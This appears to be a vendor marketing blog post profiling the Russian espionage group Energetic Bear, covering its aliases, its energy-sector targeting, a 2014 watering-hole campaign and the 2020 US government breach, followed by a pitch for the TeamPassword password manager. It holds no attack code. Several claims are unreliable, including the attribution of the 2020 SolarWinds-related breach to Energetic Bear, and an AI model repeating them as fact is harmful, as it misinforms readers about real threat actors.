Energetic Bear is likely one of Russia's oldest cyberespionage groups. Active since around 2005, Energetic Bear primarily attacks US infrastructure with a preference for the energy sector.
US Intelligence has linked Energetic Bear to Russia's FSB (formally the KGB), but it's unclear if the group works directly for Russian Intelligence or operates as a contractor. There is speculation that Energetic Bear moonlights as a criminal gang to hide its direct ties to the Russian government.
We saw some big data breaches in 2020! Make sure your company is secure.
Sign up for a 14-day TeamPassword trial to prevent attackers from stealing your company's many account credentials.
Who is Energetic Bear?
Energetic Bear is a Russian advanced persistent threat that regularly attacks US government infrastructure, including private contractors, to gather intelligence.
While Energetic Bear seems to focus on the United States, German intelligence linked the group to several 2020 attacks against the country's energy, water, and power sectors.
Energetic Bear got its name from CrowdStrike. "Energetic" being the group's codename, while "Bear" refers to a Russian advanced persistent threat group.
Energetic Bear Aliases
- Berserk Bear (Just as commonly used to reference the group as Energetic Bear)
- Crouching Yeti
- Dragonfly 2.0 (There is some indication that this group is a sub-group or close affiliate of Energetic Bear)
- Havex (One of the group's custom malware)
- IRON LIBERTY
What does Energetic Bear do?
Energetic Bear's primary goal is to collect intelligence and steal intellectual property in the energy industry, but they often try to breach aviation networks.
What makes Energetic Bear unique compared to other advanced persistent threat groups is its focus. Many cyberespionage groups attempt to access any multinational or government organization—Energetic Bear never strays far from utility infrastructure.
US Intelligence agencies and security analysts believe Energetic Bear's goal is to delegitimize SLTT (state, local, tribal, and territorial) government entities. By doing so, Energetic Bear can destabilize the country (or regions) and possibly influence elections.
The group is known for using several modes of attack, including spear-phishing, waterhole attacks, and compromising legitimate software packages.
Most of their toolsets are custom-made by the group, and their tactical, methodical approach allows Energetic Bear to remain undetected for long periods.
Famous Energetic Bear Attacks
As an active group since around 2005, Energetic Bear has been involved in many cyber attacks. Energetic Bear is also known for mimicking other hacker groups, making it difficult to know the extent of their crimes.
LightsOut Exploit - 2014
In 2014, Energetic Bear (identified as Dragonfly during this attack) used a watering hole attack to target multiple organizations in the energy sector.
Dragonfly compromised the website of a law firm that works with US energy firms to redirect users to another website while simultaneously installing a LightsOut exploit kit on the user's browser.
The LightsOut exploit kit conducts several diagnostics on the user's device to determine which malware and trojans to deploy. It then drops and attempts to install malicious payloads on the user's device.
Energetic Bear can then monitor the device, including configurations, clipboard data, and keystrokes. This information allows Energetic Bear to gather credentials and configurations to log into systems and networks.
Reports are vague about the extent of Energetic Bear's victims or the data compromised during the 2014 attacks.
United States Federal Government Data Breach - 2020
Energetic Bear is a prime suspect in one of the United States' worst cyberespionage incidents in history.
The 2020 attack infiltrated multiple US federal government institutions, including the US Treasury Department, the National Telecommunications and Information Administration, the US Department of Commerce, and many more.
Beyond the United States, the Energetic Bear stole data that affected NATO, the UK government, the European Parliament, and at least 200 more foreign organizations.
The attackers used multiple entry points, and investigators estimate the group was active on the network for eight to nine months before being detected.
Software vulnerabilities in Microsoft and VMware provided Energetic Bear with emails and other documents to carry out spear-phishing attacks. At the same time, stolen credentials from SolarWinds's Orion software provided further access.
Investigators believe this was a coordinated effort from several Russian cyberespionage groups, including Energetic Bear, Fancy Bear, and Cozy Bear.
Is Your Company Prepared for Cyber Attacks?
Stopping attackers like Energetic Bear is difficult but not impossible. While they use clever tactics and malware to infect a user's PC, they still need to steal login credentials to gain full access.
A password manager allows your team members to access systems, accounts, and web applications without using raw credentials. So, even if an attacker is monitoring their device, they'll never expose account passwords.
Protecting Your Business with TeamPassword
TeamPassword is a robust password manager designed for sharing credentials safely amongst team members, contractors, and freelancers.
Instead of using raw credentials, team members use one of TeamPassword's browser extensions (Chrome, Firefox, and Safari) to login into apps, software, and online accounts.
You can create groups for sharing passwords and only provide access to those who need it. Because team members use TeamPassword, they never see the actual password, mitigating the risk of authorized credential sharing.
And, when a team member no longer needs access, remove them with one click. No need to change passwords every time someone leaves a project!
If you need to change credentials, TeamPassword's built-in secure password generator allows you to create a unique 12-32 character password instantly. TeamPassword also updates these new credentials for all users.
One of TeamPassword's best security features is two-factor authentication (2FA). By setting up 2FA, team members must use Google Authenticate to access their TeamPassword account. So, even if attackers steal login credentials, they can't access TeamPassword without the second authentication step.
Another fantastic security feature is TeamPassword's activity log and email notifications. With the activity log, you can review every action from users on TeamPassword, making it easy to identify who is responsible for the authorized credential sharing or login attempts.
Additionally, you can set up email notifications to live-track every TeamPassword action (logins, password sharing, new accounts, and more).
Secure Your Company's Digital Assets Today!
Stop sharing passwords in spreadsheets and emails—exposing your business, customers, and clients to cyber-attacks!
Sign up for a 14-day TeamPassword trial and test our robust password manager with your team.